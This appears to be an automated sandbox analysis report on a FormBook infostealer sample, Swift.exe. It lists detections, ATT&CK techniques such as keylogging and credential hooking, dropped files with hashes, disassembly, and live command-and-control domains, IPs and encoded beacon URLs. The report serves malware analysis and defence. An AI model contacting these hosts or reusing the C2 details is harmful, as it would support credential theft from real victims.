Source: explorer.exe, 00000004.00000000.359544777.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.313211621.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.320029960.0000000005C70000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.313211621.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.368610719.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.350472428.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.368337625.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.350131385.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312807427.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.313211621.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.368610719.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.350472428.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Swift.exe

0_2_004030F1

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	512 Process Injection	1 Rootkit	1 Credential API Hooking	221 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 Virtualization/Sandbox Evasion	1 Input Capture	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	512 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Swift.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\idxgunu.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\idxgunu.exe	17%	ReversingLabs	Win32.Trojan.FormBook

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.idxgunu.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.2.idxgunu.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.Swift.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
0.0.Swift.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
1.2.idxgunu.exe.3100000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.fulili.com/b31b/?lTkLp=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://www.counterpoint.online/b31b/?lTkLp=UH1VMjfgpJMWU+/Gn4AwdepKZevv0RxNZvKJDaH/oG1tjT2ASbSXZlDS/qU1YicJYd9A&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://www.hallmarktb.com/b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://www.giaxevn.info/b31b/?lTkLp=t9u9o370/Gy8le3USielS0NDNQF4paptFWM7HrjD+/miGjlRMzz+Q3hrEpue/lFurnLE&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://www.printrynner.com/b31b/?lTkLp=/hsXnIl0hAYrOErJ4UuZDvWeNEd2/L3NRo6zO1KQ/oOCDpqqcfPNzkrpMSnMO3fUk1gw&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://www.kcrsw.com/b31b/?lTkLp=US/HGfNY9YWYLPWCTBWLA6nVcrxKwQj48xB1ut/cNKd52qSqxSuIfwmOCq9IK55e/8rl&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://www.barmanon5.pro/b31b/?lTkLp=QFC5kflo2W9xiWPHk6PVZq5LNtx9PE4uciQ0+TaWAe5dGm0MZgEm/6IYv+k7jhxT2GZX&s2MHE=y8UpS6w	0%	Avira URL Cloud	safe
http://barmanon5.pro/	0%	Avira URL Cloud	safe
www.cdlcapitolsolutions.com/b31b/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
hallmarktb.com	82.163.176.145	true	true	unknown
www.kcrsw.com	154.205.231.195	true	true	unknown
www.printrynner.com	185.53.179.174	true	true	unknown
www.giaxevn.info	188.114.97.3	true	true	unknown
www.barmanon5.pro	188.114.97.3	true	true	unknown
www.counterpoint.online	199.59.243.222	true	true	unknown
www.fulili.com	45.221.114.43	true	true	unknown
www.hallmarktb.com	unknown	unknown	true	unknown
www.duaidapduapjdp.site	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.giaxevn.info/b31b/?lTkLp=t9u9o370/Gy8le3USielS0NDNQF4paptFWM7HrjD+/miGjlRMzz+Q3hrEpue/lFurnLE&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown
http://www.fulili.com/b31b/?lTkLp=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown
http://www.hallmarktb.com/b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown
http://www.barmanon5.pro/b31b/?lTkLp=QFC5kflo2W9xiWPHk6PVZq5LNtx9PE4uciQ0+TaWAe5dGm0MZgEm/6IYv+k7jhxT2GZX&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown
http://www.counterpoint.online/b31b/?lTkLp=UH1VMjfgpJMWU+/Gn4AwdepKZevv0RxNZvKJDaH/oG1tjT2ASbSXZlDS/qU1YicJYd9A&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown
http://www.printrynner.com/b31b/?lTkLp=/hsXnIl0hAYrOErJ4UuZDvWeNEd2/L3NRo6zO1KQ/oOCDpqqcfPNzkrpMSnMO3fUk1gw&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown
www.cdlcapitolsolutions.com/b31b/	true	Avira URL Cloud: malware	low
http://www.kcrsw.com/b31b/?lTkLp=US/HGfNY9YWYLPWCTBWLA6nVcrxKwQj48xB1ut/cNKd52qSqxSuIfwmOCq9IK55e/8rl&s2MHE=y8UpS6w	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000000.382009343.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.359345292.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.325127522.0000000008260000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	Swift.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Swift.exe	false		high
http://barmanon5.pro/	rundll32.exe, 00000005.00000002.825769672.000000000596F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
154.205.231.195	www.kcrsw.com	Seychelles	26484	IKGUL-26484US	true
45.221.114.43	www.fulili.com	South Africa	328543	sun-asnSC	true
188.114.97.3	www.giaxevn.info	European Union	13335	CLOUDFLARENETUS	true
82.163.176.145	hallmarktb.com	United Kingdom	34119	WILDCARD-ASWildcardUKLimitedGB	true
199.59.243.222	www.counterpoint.online	United States	395082	BODIS-NJUS	true
185.53.179.174	www.printrynner.com	Germany	61969	TEAMINTERNET-ASDE	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	751599
Start date and time:	2022-11-22 12:47:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Swift.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/3@8/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 50.2% (good quality ratio 46.3%) Quality average: 72.4% Quality standard deviation: 30.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 98 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
VT rate limit hit for: Swift.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.221.114.43	202217110313.exe	Get hash	malicious	Browse	www.fulili.com/b31b/?JBZ0W=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqe20FbIXBW8LwKdMbQ==&cRGL=SjX8cfY8C
188.114.97.3	DHL Invoice Details_pdf.exe	Get hash	malicious	Browse	www.uula.shop/j17j/?q81=ocl2t9wPLn3rySApupcGUIGkq6SFI7WqimoV3x7GqXJo0G+nrWoDjkc7nNdFko8eBnl8gwW7/A==&YP=2dL8spvh06GD
	proforma corregida.exe	Get hash	malicious	Browse	www.all-about-chandeliers.com/tc10/?C0G=xmlXRh7t1LNA11YQxrFH8v7GzKMnvtnvMT+M318jxWtPCSxV5zFJ4IVhKgltDtotnTqeZNjdhQ==&s2Jtf=2dQtW2l0Zdq
	FedEx Docs.exe	Get hash	malicious	Browse	www.mensfitnesstalk.com/fqsu/?GVE=Zf4p&TR-pfv=dTNBrpqYyfl45l0DWGwzRvffp7Lk5FRBAdQBLPfi59LEdsyrTAH8GlhDXz9eaN7eTYpZdFI9fl5mry3LQD3aF1lF9+RH2lD48Q==
	#U91c7#U8d2d#U8ba2#U5355 2 L004.exe	Get hash	malicious	Browse	www.mensfitnesstalk.com/fqsu/?8p=dTNBrpqYyfl45l0DWGwzRvffp7Lk5FRBAdQBLPfi59LEdsyrTAH8GlhDXz9eaN7eTYpZdFI9fl5mry3LQD3fMVxJwdJl1W2AqNk9BVAkUFXs&o0G0=x4_TrBKP
	1REffCATuE.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	SecuriteInfo.com.Win32.PWSX-gen.16902.13840.exe	Get hash	malicious	Browse	www.mensfitnesstalk.com/fqsu/?V2J=dTNBrpqYyfl45l0DWGwzRvffp7Lk5FRBAdQBLPfi59LEdsyrTAH8GlhDXz9eaN7eTYpZdFI9fl5mry3LQD3aF1lF9+RH2lD48Q==&6l=DByl
	file.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	file.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	file.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	Messaggi in quarantena.zip	Get hash	malicious	Browse	www.coinkub.com/wp-content/NL7Ddclhm/
	UGk3XUNnFZ.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	Files.exe	Get hash	malicious	Browse	www.mensfitnesstalk.com/fqsu/?5jU=dTNBrpqYyfl45l0DWGwzRvffp7Lk5FRBAdQBLPfi59LEdsyrTAH8GlhDXz9eaN7eTYpZdFI9fl5mry3LQD3aF1lF9+RH2lD48Q==&R47Ts6=rVOxyDoPm0E
	proforma.exe	Get hash	malicious	Browse	www.alyfu.cfd/gqog/?uHVXz=R61XCh7&RhTDAvoH=fjQBhafQmkCy6ivjFcbG5UeMOb+/CME6rtbxZ45vWBRRgBfpAXZYGQogkgshkTKyc/2u4QAGDovXLgdLVUVukZqdLfsHxBNPQA==
	SecuriteInfo.com.FileRepMalware.15997.32702.exe	Get hash	malicious	Browse	www.mensfitnesstalk.com/fqsu/
	FZ3ykwbW1n.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	TDQlqPs1qE.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	4s5dNzNr4S.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	VxrOyMFaCd.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	c3sDf0G3zO.exe	Get hash	malicious	Browse	xv.yxzgamen.com/logo.png
	factura pdf.exe	Get hash	malicious	Browse	www.tipscepathamil.top/gqog/?1bEX_N=jV6J+tySKAvKtjFWOZ39oU3Itl91XstQ6OObXABCDken8/dVcI8bBE7Z4UJx2KSlf0djO4v23978AtovX2YxNrd5ev7rSfMQlg==&XpIxA=7nKPFFYPIXJ4t6Np

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.fulili.com	202217110313.exe	Get hash	malicious	Browse	45.221.114.43
www.barmanon5.pro	dekont.exe	Get hash	malicious	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IKGUL-26484US	TFY6m4XxhK.elf	Get hash	malicious	Browse	154.90.25.171
	1X9CwAKCW5.elf	Get hash	malicious	Browse	156.231.211.172
	5217elgSMw.elf	Get hash	malicious	Browse	156.249.34.158
	zg8P6HaVf2.elf	Get hash	malicious	Browse	156.251.85.205
	arm.elf	Get hash	malicious	Browse	156.251.85.221
	arm7.elf	Get hash	malicious	Browse	156.231.181.99
	dark.x86.elf	Get hash	malicious	Browse	156.251.85.208
	soI8yStlNX.elf	Get hash	malicious	Browse	156.238.135.149
	DHL-INV-MVU.exe	Get hash	malicious	Browse	164.155.184.73
	TFpJd10aYO.elf	Get hash	malicious	Browse	156.251.91.60
	SecuriteInfo.com.Linux.Siggen.9999.15749.17.elf	Get hash	malicious	Browse	156.247.139.198
	payment 11072022 PDF.exe	Get hash	malicious	Browse	164.155.181.43
	X3zG3BX7xM.exe	Get hash	malicious	Browse	164.155.153.59
	ADNOC97571784.exe	Get hash	malicious	Browse	164.155.184.73
	7G3SgxYDJe.elf	Get hash	malicious	Browse	154.219.20.135
	Qr3TBNOPbb.elf	Get hash	malicious	Browse	156.231.211.172
	3FZqnQXmtj.elf	Get hash	malicious	Browse	156.249.231.148
	http://a.datingtorrid.top	Get hash	malicious	Browse	45.155.120.145
	DETAILS AND INVOICES.exe	Get hash	malicious	Browse	164.155.184.73
	666.x86	Get hash	malicious	Browse	156.249.231.164

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aznhzp.mba

Download File

Process:	C:\Users\user\Desktop\Swift.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.991186140953667
Encrypted:	true
SSDEEP:	3072:SCI0X6PKNMckE3XPTJETzlXK0Ow1iA+c563GMIv1C9lvhLMzx/oKURZw:HfqihnP0lXKi5tv1khLMN/F
MD5:	B3581DEFA6B04B02EC74081EBE1CDF25
SHA1:	F721FCA7FB1C097F954DB044CA05F39482F65C2D
SHA-256:	FDABA24D7BE4CACECFC6068D585D8135138D35D4513047BEABD35ECDC567C106
SHA-512:	F351CBB5818E4B9C171FE9AC9B4EE342F6A2D30E7E818A684C98668F3F356D2558D65FFCF97AB14DA252DC830824FFEEB905C91962CC0E65D8236799E775FA4B
Malicious:	false
Preview:	~>.....(....^.r...0..E~SN..H...h..m..i.O..UMS.M.xy..]C...#.tS."...a.Z........Mj.7..#....n&..:r).w....l+.$...p.!\..Q...kt.(.)X..lX.W...;...A..X.{?...CP.2.1.y..6h\|x)..oy..m./...p"P..+\.2..A..4...}.c...\;....:.Eg...........T.fF.L..........h.Ov.....u..../....(..L,u..E....]..n..,..>..h..m..i.O.\|UMy.M.xy.H]C...#.RS.">v.4.\|.QP'......y.W:.....C-.v=.^.{..A.KE.p...+q.d.8{~r_...kt.f.$....[.Z.....V"A..l>.>.._4...{.@....>"..==.\m./...p".H#z..2......B..b....\;....I.....].%m.....T.fF.f........w.h.O......uK../v...(..w,u..E..S.](.n..,..>..h..m..i.O..UMS.M.xy..]C...#.RS.">v.4.\|.QP'......y.W:.....C-.v=.^.{..A.KE.p...+q.d.8{~r_...kt.f.$....[.Z.....V"A..l>.>.._4...{.@....>"..==.\m./...p"P..+\.2.....@..b.I...\;....I.....]..m.....T.fF.f........w.h.O......uK../v...(..w,u..E..S.](.n..,..>..h..m..i.O..UMS.M.xy..]C...#.RS.">v.4.\|.QP'......y.W:.....C-.v=.^.{..A.KE.p...+q.d.8{~r_...kt.f.$....[.Z.....V"A..l>.>.._4...{.@....>"..==.\m./...p"P..+\.2.....@..b.I...\;....I.....]..m.....T.fF.

C:\Users\user\AppData\Local\Temp\idxgunu.exe

Download File

Process:	C:\Users\user\Desktop\Swift.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.661907079525093
Encrypted:	false
SSDEEP:	96:T8K8VVj9trqlkpsKqlLPOoynfdcc3w7IbxT9:T8fbfpL2POoynlcIw7IJ
MD5:	8748279BD1A60B520E0F062016B094E8
SHA1:	78C8A552DD69B232715981C3EAC3C1C2EC224F38
SHA-256:	6875C3049ED37AD538DDE61F99C49917BBBE21B74BA6896626EC62EDF689D2FD
SHA-512:	7F0A74986E2AF5649554670B97FB87B8768A286C9E43795BA0A309185D4F2BA8F4080DC741AA9BB6741A6A3B5575CDA39B5C4760CA246BE678087BA4D6C035F7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.....h...h...h.N.i...h...i...h...l...h...f...h...b...h...l...h.......h...j...h.Rich..h.................PE..L...x.\|c...............!..................... ....@..........................`............@..................................#.......@.......................P.. ....!............................................... ...............................text...S........................... ..`.rdata..f.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.. ....P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jdgedcev.bx

Download File

Process:	C:\Users\user\Desktop\Swift.exe
File Type:	data
Category:	dropped
Size (bytes):	5744
Entropy (8bit):	6.22601758413913
Encrypted:	false
SSDEEP:	96:zd+w7+wAwep+dfJ89y1IVTVpTgwNhfYnbkHznTD1CcEg:ZXNAwcCfJpIhTTJNebkHz//
MD5:	18E2B6CAC2A0EA0A11FAD297712721BC
SHA1:	8C947C4D4A6E53F30EAC64C7E830F325CEE6775A
SHA-256:	1D8D7C32217EED7730B45B61ED0F98586B38F09C2B5FF8AA6292E1A40FF71E4D
SHA-512:	72D658D15E6B0A418CF41C3CAFE050CD59E5036C91CE7C54BDCD7BE3C9761A54D620688D60BD315FE4466B6051E329BE9010E245628DFABB9C3CC89C43C2B7A8
Malicious:	false
Preview:	}.vxxDU.xxx[8.[8.[x[x[8..[.DU.xxx..[8.[.[ow..w..uxx!...[2+o.{..{s[b@.....x.[.[...xx.{.[....b. s.s.:[.!w.}.....x.[.eDU.xxx[8.[8.[x[x[8.._..wh..xxx!...)i\|e.ww.o...a\|.......[.[a..[.!...[..!...[..!w..;.^..`.b..u.q.....x.[.eec..[...r[.<[d0.s.[h.[..s.[..s.[8.s.].\|]ip]a.!...[..s.h.>www+a...[.\|b+..F.........x[ap...H[..s.{{.[.eec..DU.xxx[8.[8.[x[x[8...U..h..www[..[..].pw.w.[.w.+....A\|x.w.!..[a.;.]a....0...[...[.).....p[..B+.)j....p)b....B+.[....B+...[..[.\|..v3]...].\|w.p+.[a.F...{s..8......x.[.[...xx.{.[....).v. s.s.:[.!w.......x.[....vxx.a.uxxx)a.]a..a.+.a...a...a.F.a.C.A.x.Apx...B]a...B]a..J.B]a....B]a...B]a..H.B]a....B]a..I.B]a....B]a....B]a...B]a.yww]a..BS..w..>zww]a,..2..w...zww]aX..F..w...zww]a\....w..nyww]aP.8p..w..~yww]aT..>..w...yww]a.....w...yww]a...X%.w...yww]a(..8..x.d....8..x.d....8...d....8..s.d..b..8..v.d..5)a.]a..A.x{.[a.8]a.....C.[a....s.o.[a...[i...l.. [a.`l..{.8..x..d...5..x..l..+..B..8..x..d...5..x..l..+..l..8....d...5....l..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.898804910826751
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Swift.exe
File size:	226494
MD5:	0202c53a04751949b148ac5eab59030e
SHA1:	32febcf0ec3e26a2852a677a1e0f80a520844ee4
SHA256:	ad6df53019d5d8930fce4ad4a7e0d15a08d9771b3cff97b7c06bf3df364c17a4
SHA512:	07ea4cb41cbd1860ee7a9ff87b949372735f62e4e3dab916b2cc0493e5f1748cf64534afe454c81c06982d9b2c7e6a7bedaa72132b381c3f24da746cfec1dab6
SSDEEP:	6144:MEa0Nyh7Uk49DgIyU3wmtax8+3AdmVsrPW1QBho5p:XUUk49DgIyU3Bp4HVQs4o7
TLSH:	73241203F1D120F7D69341B71DB5A33BDB7F8644212A03DB8B781FBA6E1A683718A591
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.@.B...B...B../M...B...B..uB../M...B...a...B..+D...B..Rich.B..........................PE..L...cy.V.................^....9....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x4030f1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x567F7963 [Sun Dec 27 05:38:43 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	29b61e5a552b3a9bc00953de1c93be41

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+14h], 00409188h
xor esi, esi
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B4h]
call dword ptr [004070B0h]
cmp ax, 00000006h
je 00007FA99CDD1A13h
push ebx
call 00007FA99CDD47E9h
cmp eax, ebx
je 00007FA99CDD1A09h
push 00000C00h
call eax
push 0040917Ch
call 00007FA99CDD476Ah
push 00409174h
call 00007FA99CDD4760h
push 00409168h
call 00007FA99CDD4756h
push 0000000Dh
call 00007FA99CDD47B9h
push 0000000Bh
call 00007FA99CDD47B2h
mov dword ptr [007A2784h], eax
call dword ptr [00407034h]
push ebx
call dword ptr [00407270h]
mov dword ptr [007A2838h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0079DD48h
call dword ptr [00407160h]
push 0040915Ch
push 007A1F80h
